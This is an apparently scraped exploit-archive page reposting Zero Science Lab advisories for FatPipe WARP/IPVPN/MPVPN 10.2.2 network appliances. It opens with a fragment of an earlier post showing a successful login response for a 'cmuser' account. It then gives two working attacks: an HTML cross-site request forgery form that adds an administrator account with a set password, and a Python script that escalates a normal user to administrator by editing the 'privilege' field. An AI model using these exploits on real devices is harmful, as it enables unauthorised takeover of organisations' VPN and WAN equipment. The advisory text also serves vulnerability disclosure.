patented MPSec technology at the click of a button. Central Manager = cmuser. Once authenticated, you get admin rights. HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Type: application/json;charset=ISO-8859-1 Content-Length: 118 Date: Fri, 06 Aug 2017 16:37:07 GMT Connection: close {"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
HireHackking
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com <!-- FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP / IPVPN / MPVPN 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5681 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php 30.05.2016 25.07.2021 --> <html> <body> <form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST"> <input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' /> <input type="submit" value="Submit" /> </form> </body> </html>
HireHackking
# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com #!/usr/bin/env python3 # # # FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation # # # Vendor: FatPipe Networks Inc. # Product web page: https://www.fatpipeinc.com # Affected version: WARP / IPVPN / MPVPN # 10.2.2r38 # 10.2.2r25 # 10.2.2r10 # 10.1.2r60p82 # 10.1.2r60p71 # 10.1.2r60p65 # 10.1.2r60p58s1 # 10.1.2r60p58 # 10.1.2r60p55 # 10.1.2r60p45 # 10.1.2r60p35 # 10.1.2r60p32 # 10.1.2r60p13 # 10.1.2r60p10 # 9.1.2r185 # 9.1.2r180p2 # 9.1.2r165 # 9.1.2r164p5 # 9.1.2r164p4 # 9.1.2r164 # 9.1.2r161p26 # 9.1.2r161p20 # 9.1.2r161p17 # 9.1.2r161p16 # 9.1.2r161p12 # 9.1.2r161p3 # 9.1.2r161p2 # 9.1.2r156 # 9.1.2r150 # 9.1.2r144 # 9.1.2r129 # 7.1.2r39 # 6.1.2r70p75-m # 6.1.2r70p45-m # 6.1.2r70p26 # 5.2.0r34 # # Summary: FatPipe Networks invented the concept of router-clustering, # which provides the highest level of reliability, redundancy, and speed # of Internet traffic for Business Continuity and communications. FatPipe # WARP achieves fault tolerance for companies by creating an easy method # of combining two or more Internet connections of any kind over multiple # ISPs. FatPipe utilizes all paths when the lines are up and running, # dynamically balancing traffic over the multiple lines, and intelligently # failing over inbound and outbound IP traffic when ISP services and/or # components fail. # # FatPipe IPVPN balances load and provides reliability among multiple # managed and CPE based VPNs as well as dedicated private networks. FatPipe # IPVPN can also provide you an easy low-cost migration path from private # line, Frame or Point-to-Point networks. You can aggregate multiple private, # MPLS and public networks without additional equipment at the provider's # site. # # FatPipe MPVPN, a patented router clustering device, is an essential part # of Disaster Recovery and Business Continuity Planning for Virtual Private # Network (VPN) connectivity. It makes any VPN up to 900% more secure and # 300% times more reliable, redundant and faster. MPVPN can take WANs with # an uptime of 99.5% or less and make them 99.999988% or higher, providing # a virtually infallible WAN. MPVPN dynamically balances load over multiple # lines and ISPs without the need for BGP programming. MPVPN aggregates up # to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed # you need to keep your VPN up and running despite failures of service, line, # software, or hardware. # # Desc: The application suffers from a privilege escalation vulnerability. # A normal user (group USER, 0) can elevate her privileges by sending a HTTP # POST request and setting the JSON parameter 'privilege' to integer value # '1' gaining administrative rights (group ADMINISTRATOR, 1). # # Tested on: Apache-Coyote/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5685 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php # # # 30.05.2016 # 25.07.2021 # # import sys import time####### import requests################ requests.packages.urllib3.disable_warnings() if len(sys.argv) !=2: print print("********************************************************") print("* *") print("* Privilege escalation from USER to ADMINISTRATOR role *") print("* in *") print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") print("* *") print("* ZSL-2021-5685 *") print("* *") print("********************************************************") print("\n[POR] Usage: ./escalator.py [IP]") sys.exit() ajpi=sys.argv[1] print juzer=raw_input("[UNE] Username: ") pasvord=raw_input("[UNE] Password: ") sesija=requests.session() logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'} hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', 'Accept' :'application/json, text/javascript, */*; q=0.01', 'X-Requested-With':'XMLHttpRequest', 'Sec-Ch-Ua-Mobile':'?0', 'User-Agent' :'Fatnet/1.b', 'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8', 'Origin' :'https://'+ajpi, 'Sec-Fetch-Site' :'same-origin', 'Sec-Fetch-Mode' :'cors', 'Sec-Fetch-Dest' :'empty', 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', 'Accept-Encoding' :'gzip, deflate', 'Accept-Language' :'en-US,en;q=0.9', 'Connection' :'close'} juarel1='https://'+ajpi+'/fpui/loginServlet' alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False) if not 'success' in alo.text: print('[GRE] Login error.') sys.exit() else: print('[POR] Authentication successful.') print('[POR] Climbing the ladder...') sluba=''' || || .--._ ||====|| __ '---._) || ||"")\ Q Q ) ||====|| =_/ o / || || | \_.-;-'-,._ ||====|| | ' o---o ) || || \ /H __H\ / ||====|| '-' \"")\/ | || || _ |_='-)_/ ||====|| / '. ) || || / / ||====|| |___/\| / || || |_| | | ||====|| / ) \\ \\ || || (__/ \___\\ ||====|| \_\\ || || / ) ||====|| (__/ ''' for k in sluba: sys.stdout.write(k) sys.stdout.flush() time.sleep(0.01) juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' posta={ 'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' } stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False) if not 'true' in stanje.text: print('\n[GRE] Something\'s fishy!') sys.exit() else: print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') sys.exit()